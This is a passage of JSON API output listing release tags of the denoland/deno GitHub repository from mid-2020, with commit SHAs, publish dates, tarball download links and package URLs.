2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"